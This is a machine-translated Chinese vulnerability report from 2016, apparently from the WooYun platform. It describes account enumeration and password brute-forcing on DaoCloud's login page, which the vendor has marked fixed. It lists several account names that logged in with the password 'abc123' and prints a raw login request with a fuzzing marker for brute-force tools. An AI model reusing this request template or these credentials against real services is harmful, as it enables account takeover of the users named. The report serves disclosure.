漏洞标题 DaoCloud可以批量扫描/破解/帐户密码 相关制造商 Daocloud.io 漏洞作者 用UltraEdit 提交时间 2016-06-28 03: 18 公共时间 2016-06-28 10: 28 漏洞类型 缺乏对帐户系统的控制 危险等级 在 自我评估等级 10 漏洞状态 制造商已修复 标签标签 漏洞详细信息 DaoCloud登陆页面,可以批量扫描注册用户 https://account.daocloud.io/signin 帐号 帐号:只是密码: abc123 帐号:凯恩密码: abc123 帐号:新手密码: abc123 账号:史努比密码: abc123 由于规则很少且不常用,因此仅扫描这些规则。 漏洞证明: 提交地址: POST/access-token HTTP/1.1 接受: application/json,text/plain,*/* 内容类型: application/json; charset=utf-8 Referer:https://account.daocloud.io/signin 接受语言: zh-CN 来源:https://account.daocloud.io Accept-Encoding: gzip,deflate 用户代理: Mozilla/5.0(Windows NT 10.0; Trident/7.0; rv: 11.0)像Gecko 主机: api.daocloud.io 内容长度: 51 连接:关闭 缓存控制:无缓存 {'email_or_mobile':'§Wooyun§','password':'abc123'} 否: 1登录页面扫描注册用户
否: 2已成功扫描帐户
否: 3成功登录到用户页面
修理计划: 版权声明:请注明出处。 UltraEdit的@乌云